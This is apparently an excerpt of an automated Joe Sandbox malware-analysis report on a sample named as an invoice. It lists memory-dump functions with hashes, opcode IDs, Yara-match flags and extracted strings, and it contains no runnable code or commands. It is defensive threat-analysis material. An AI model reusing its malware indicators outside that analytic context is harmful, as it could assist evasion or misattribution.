                                  • Instruction Fuzzy Hash: 019002A120190403D1407558480460B000D97E0302F56C011A6064555ECA2D8D516235
                                  Function 01A52E30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42e14c9b37b84c4fd9ebd0f1205919ecafa2c8a9cdd7d4a554211c156bbcbfd4
                                  • Instruction ID: 85f49e96556bfa1a8dbf3805a739bec86276f8e0e3e8bd2cc42bf8875512f5fb
                                  • Opcode Fuzzy Hash: 42e14c9b37b84c4fd9ebd0f1205919ecafa2c8a9cdd7d4a554211c156bbcbfd4
                                  • Instruction Fuzzy Hash: 4D90026130150402D1027158441460A000DD7E1345F96C012E5424555DC6298A53A232
                                  Function 01A53090 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6c985135faabd83cf04d9f4a62f6ab9f75099101fd0adc216c8ff431f555910
                                  • Instruction ID: b357a39d53c17fe82e0ab7195ff044dca12401e93a1719f05e6caa073c03dfb3
                                  • Opcode Fuzzy Hash: c6c985135faabd83cf04d9f4a62f6ab9f75099101fd0adc216c8ff431f555910
                                  • Instruction Fuzzy Hash: 8F90026124150802D1407158841470B000ED7E0601F56C011A4024554DC61A8A6567B1
                                  Function 01A53010 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 750322debee906e0664baee20f9b30882ab35c1570c0d49e96ab5a55e50167a7
                                  • Instruction ID: 61d6c4d3c07a7dc5bf15261d5b39f1576595a907e94faac750b9a4e2e74aed7d
                                  • Opcode Fuzzy Hash: 750322debee906e0664baee20f9b30882ab35c1570c0d49e96ab5a55e50167a7
                                  • Instruction Fuzzy Hash: 2590026120194442D14072584804B0F410D97F1202F96C019A8156554CC91989555721
                                  Function 01A539B0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2cd95070d0e6ddc54f0d6526148b09715e1dadae5e458d66d6e737bfeeb5001c
                                  • Instruction ID: 74432b5b89bbd3ba73b40cde0cedd0473c597a50a0ddfd17dd501ebb7c67f2de
                                  • Opcode Fuzzy Hash: 2cd95070d0e6ddc54f0d6526148b09715e1dadae5e458d66d6e737bfeeb5001c
                                  • Instruction Fuzzy Hash: 0190026124555102D150715C440461A400DB7F0201F56C021A4814594DC55989556321
                                  Function 01A53D10 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f617a054aba9ecf70e4527c7438e70b45a541e8b6c4fac562aa8d68312e8cf08
                                  • Instruction ID: e45d81ddf965c7f8a0745d5c84bfe51ed154f452b797b00213f4afb04bf75749
                                  • Opcode Fuzzy Hash: f617a054aba9ecf70e4527c7438e70b45a541e8b6c4fac562aa8d68312e8cf08
                                  • Instruction Fuzzy Hash: EC90027120250142954072585804A4E410D97F1302F96D415A4015554CC91889615321
                                  Function 01A53D70 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b879c38a1820c147919d149dc82a2dee71ced5910b74019595993e629d169056
                                  • Instruction ID: c99188bde80be745e5727b86d8b82b190f44ede2a66f3dd06d29ff0f8f1a1ff7
                                  • Opcode Fuzzy Hash: b879c38a1820c147919d149dc82a2dee71ced5910b74019595993e629d169056
                                  • Instruction Fuzzy Hash: 4B90027520150402D5107158580464A004E97E0301F56D411A4424558DC65889A1A221
                                  Function 01A52C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 27ef3ddbc13353e326c5d594e920d2e8869d9dc1b373d9e55d14139ff595259e
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Function 01A52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 05e745d8fb3074afeb176af085a784e0ff6667cf1336c392dfd7f4e51b9ef9f0
                                  • Instruction ID: ed4695f86c3d5f3d6bd0c58b2b486b0a542480d2d72d23fd327516d6420e87cc
                                  • Opcode Fuzzy Hash: 05e745d8fb3074afeb176af085a784e0ff6667cf1336c392dfd7f4e51b9ef9f0
                                  • Instruction Fuzzy Hash: 3D510AB5A04116FFDB56DFACC980A7EFBB8BB48240714812AF965D7641D334DE4087E0
                                  Function 01AC2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 7d6a87d4cbcd25e23cc5ed0db03163794dfaf3c89c040a9611c12184e6469360
                                  • Instruction ID: c99c53a3b3f968b96d1f533e0d622556a07165ade9e185cbe778e80d7aedee7e
                                  • Opcode Fuzzy Hash: 7d6a87d4cbcd25e23cc5ed0db03163794dfaf3c89c040a9611c12184e6469360
                                  • Instruction Fuzzy Hash: 12510775A00649AFDB31DF6CCA90A7FFBF8EF54600B04846FE496D7682D674DA408760
                                  Function 01A47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A84655
                                  • Execute=1, xrefs: 01A84713
                                  • ExecuteOptions, xrefs: 01A846A0
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A84742
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A84725
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A846FC
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A84787
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 97353e4e1d8ca1cc933fec83924debdd439245827c76b1d7a46ce2bc34124ab8
                                  • Instruction ID: 288f6604016c6858955ee144bf030e6d9c1225e1151eb97d23cb90977847761f
                                  • Opcode Fuzzy Hash: 97353e4e1d8ca1cc933fec83924debdd439245827c76b1d7a46ce2bc34124ab8
                                  • Instruction Fuzzy Hash: CB51183160025ABBEF21EBE9DD85FAA77B9EF98304F0400A9D605A7181EB709A458F50
                                  Function 01AE6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                  • Instruction ID: 06a543f3b057dd1544a267aa89f95bec6cd0f4b11f3d5d310782fab7207ce805
                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                  • Instruction Fuzzy Hash: E1022471508342AFD705CF28C598A6BBBF5EFD8714F44892DF9898B260DB31E905CB92
                                  Function 01A5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction ID: e244075547fc5ac0e3894e226ab8bb8d2732dc9ff8578af76728c1d5c4fb8f25
                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction Fuzzy Hash: 65819F70E0A2499EEF658F6CC8917BEBBB3AF45322F1C4159DC61A76D1C73498408B71
                                  Function 01AC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: 1c613d767c6bdd36229200d7c4c80ab5fe753fc6926ec8c460294d9ac4ce6a82
                                  • Instruction ID: a850e7029d9a5c32088b3970bc5cf10e53031dcab4d3c31ecc098092188453ff
                                  • Opcode Fuzzy Hash: 1c613d767c6bdd36229200d7c4c80ab5fe753fc6926ec8c460294d9ac4ce6a82
                                  • Instruction Fuzzy Hash: F421477AA00219ABDB11DF79DD40AFE7BF8EF94A54F45011AEE05E3240E730D9018BA1
                                  Function 01A3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A802E7
                                  • RTL: Re-Waiting, xrefs: 01A8031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A802BD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 13b5a5365340664a713f63952fe692d9764f26633a3a34198759c9a99b5b469c
                                  • Instruction ID: 7e6d18add7100dd1dfe8f5f8c0988c3f37c3867f8a6ac5716fe580d37a633ee8
                                  • Opcode Fuzzy Hash: 13b5a5365340664a713f63952fe692d9764f26633a3a34198759c9a99b5b469c
                                  • Instruction Fuzzy Hash: A3E1AE70A187429FD726DF28C984B2ABBE0BF84324F140A5DF5A5CB2E1D774D849CB42
                                  Function 01A4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Resource at %p, xrefs: 01A87B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A87B7F
                                  • RTL: Re-Waiting, xrefs: 01A87BAC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: d6a30808e2edc480fac41cafb304bf5819033d1ca048955275b0335af2798ce1
                                  • Instruction ID: c1a244abf2a8935d3fe6922d8c658a40f4e8c45e50a49d2b4c1825a54d7d8c77
                                  • Opcode Fuzzy Hash: d6a30808e2edc480fac41cafb304bf5819033d1ca048955275b0335af2798ce1
                                  • Instruction Fuzzy Hash: 3441D3353047029FDB25DF29C941B6AB7E5EFD8720F100A1DFA5ADB680DB31E8458BA1
                                  Function 01A4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A8728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 01A872A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A87294
                                  • RTL: Re-Waiting, xrefs: 01A872C1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: e8b1deb3e1308f3575790e46e28ce152002c1739aebe4b425ee3f6c1238634c3
                                  • Instruction ID: 682c6cc000a70980d39856d040641319f9efbe2c15e7f172e1b072c08de6fecf
                                  • Opcode Fuzzy Hash: e8b1deb3e1308f3575790e46e28ce152002c1739aebe4b425ee3f6c1238634c3
                                  • Instruction Fuzzy Hash: D1410231700202ABDB21EF69CD41B6ABBA5FB94710F240619F955EB241EB31F852CBE1
                                  Function 01AC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: d0487122adff7a578a4b22d87e3345ca0336cac1325236a2ad51991155a89f2a
                                  • Instruction ID: 76cb125fe9d04974f962c879fe7a69875924746b72e84374a2ab64c50d19c846
                                  • Opcode Fuzzy Hash: d0487122adff7a578a4b22d87e3345ca0336cac1325236a2ad51991155a89f2a
                                  • Instruction Fuzzy Hash: F5317876A002199FDB21DF2DDD40BEEB7F8FF54610F44459AE949E3240EB309A548BA0
                                  Function 01A57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction ID: 65b931881f94545dcf87752103bb880187d8517a086c2e8ccde55199b6265822
                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction Fuzzy Hash: D091C371E082169BEFA4DFADC880ABEBBB5AF44320F94451AED55B72C0D7348944CB50
                                  Function 01A19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 029c7a592be295e9803f637ae1c965f9221b9bad24f497919bf20a86c84c4f64
                                  • Instruction ID: a7fe8abbc1640089eed7c7d70b8350a32a9110b4513f3a5b2e9bff56ae740e94
                                  • Opcode Fuzzy Hash: 029c7a592be295e9803f637ae1c965f9221b9bad24f497919bf20a86c84c4f64
                                  • Instruction Fuzzy Hash: 3481FB71D002699BDB35DB54CD44BEAB7B8AB48754F0441EAEA1EB7280E7705E84CFA0

                                  Executed Functions

                                  Function 036F6C01 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5e66e5a5b247b763a9c6a57dc3330c17121a4afa51b69e887cdb6799565867c
                                  • Instruction ID: 0f667300ce5c2dc66c057b32646433716096f48d0eac22304bf120bfb4e746a6
                                  • Opcode Fuzzy Hash: b5e66e5a5b247b763a9c6a57dc3330c17121a4afa51b69e887cdb6799565867c
                                  • Instruction Fuzzy Hash: 5F41D2516582F14ED31E836D48BD675AFC18E9720174EC2FEDADA6F2F3C0888418D3A1
                                  Function 036F642E Relevance: 25.4, Strings: 20, Instructions: 385COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %M$1p$2c$4$5$$6F$@$C$G$Pf$V$$W-$^0$n\${v$}m%M$Q$g$j$r
                                  • API String ID: 0-2444733925
                                  • Opcode ID: ed6d15d1513750365a0994ca2ebccd9980f5fde2808f833e2aafc9943e0c7bf3
                                  • Instruction ID: 9888f3ff0a05f99f0e57cf4d15d7d91e8b90258dbe16bbf8032fde33a842001c
                                  • Opcode Fuzzy Hash: ed6d15d1513750365a0994ca2ebccd9980f5fde2808f833e2aafc9943e0c7bf3
                                  • Instruction Fuzzy Hash: 40229DB0D05229CFEB24CF44CA98BEDBBB2FB44308F1081D9C6596B281D7B55A89CF55
                                  Function 03703E6E Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6$O$S$\$s
                                  • API String ID: 0-3854637164
                                  • Opcode ID: 1cd713b9cf033ac37d51d853ba1a8109c06bdfd4ef25ff915f2c33d337fb3518
                                  • Instruction ID: 226634d9ba74b11e84114672f9ea4efcadd000cb3595bb9e49d53e5cf639da77
                                  • Opcode Fuzzy Hash: 1cd713b9cf033ac37d51d853ba1a8109c06bdfd4ef25ff915f2c33d337fb3518
                                  • Instruction Fuzzy Hash: 4751A276D01218AEDB10DFD4DC48EEAB3B8EB44711F148199ED09AA140E771AA588BE1
                                  Function 037115AE Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 4o
                                  • API String ID: 0-670997953
                                  • Opcode ID: b4ca94f05c80aef0a6370f463dc310660186388fc7924d436637752397ebbe2f
                                  • Instruction ID: a7066f43050b75aca02ddeacc91742416bc62a96bfac30c27bf3a7d17e5a6ad9
                                  • Opcode Fuzzy Hash: b4ca94f05c80aef0a6370f463dc310660186388fc7924d436637752397ebbe2f
                                  • Instruction Fuzzy Hash: 0D11D0B6D11219AF8B00DFA9D8419EFB7F9EF48210F14466EE915E7240E7705A148BE4
                                  Function 03711D0E Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [
                                  • API String ID: 0-3431493590
                                  • Opcode ID: 3987aa50357aff267e7eda2e7c9f7792c107fdea569a1d4289cc59a4af7eb68f
                                  • Instruction ID: 71956721a59dde8cfe98ea5bf3019d34d8faa8e13396b1e34e2cc300c5a1af59
                                  • Opcode Fuzzy Hash: 3987aa50357aff267e7eda2e7c9f7792c107fdea569a1d4289cc59a4af7eb68f
                                  • Instruction Fuzzy Hash: 8411E9B6D01218AF8B00EFA9DC419EEBBF9EF48610F14456EE919E7200E7705A158BA4
                                  Function 036F017F Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28a0fc08f21ac17c45180a42ea848cfb94609e3a5639d615aeae5d9b0fc4477e
                                  • Instruction ID: 5da37013d2bbf45e7118f924a15f896545035b6732706e69535aa9775f81b729
                                  • Opcode Fuzzy Hash: 28a0fc08f21ac17c45180a42ea848cfb94609e3a5639d615aeae5d9b0fc4477e
                                  • Instruction Fuzzy Hash: 6B517772A44602EFC725DF78D9855E6FBF8FF05315B08496EC9498B202E331A046CBE5
                                  Function 036F0000 Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 442c781ad6ff600588d3933f39502b561b8a8b8a6f8c39ae8cb33550796c58c0
                                  • Instruction ID: 763ccccabb43167577659909df5f3f45c6945654544cd51faa46fbf76d8d21fd
                                  • Opcode Fuzzy Hash: 442c781ad6ff600588d3933f39502b561b8a8b8a6f8c39ae8cb33550796c58c0
                                  • Instruction Fuzzy Hash: 933161B2911219AFDB14CF99CC85EEEBBBDEF49710F00415AFA049A241E7B19650CBA0
                                  Function 03714C3E Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29161e19695edcf695d69bb754a5232fa5023b4ab8e8dbe0f9c620a8164c77eb
                                  • Instruction ID: cffb2a486cb6b28d098d5a648a23d71dd16c9bf50cd07bf24deeef1dc1f4cdf2
                                  • Opcode Fuzzy Hash: 29161e19695edcf695d69bb754a5232fa5023b4ab8e8dbe0f9c620a8164c77eb
                                  • Instruction Fuzzy Hash: 4B31C3B5A01648AFDB14DF99D884EDEBBF9EF8C710F108209F919A7344D770A851CBA4
                                  Function 03714D9E Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_36f0000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ca4415ec68aefc1ac42247ef770f6cf708d32080fc98901bd6ee214c4fe57ea
                                  • Instruction ID: 7b9fff695fc7bc94ce9291a8d4f03cc29ec0299c412808a92045d5dbb7b07285
                                  • Opcode Fuzzy Hash: 5ca4415ec68aefc1ac42247ef770f6cf708d32080fc98901bd6ee214c4fe57ea
                                  • Instruction Fuzzy Hash: 6731E6B5A00248AFDB14DF99D880EDEBBB9EF88710F108209FD18A7344D770A8118BA4
                                  Function 0371468E Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
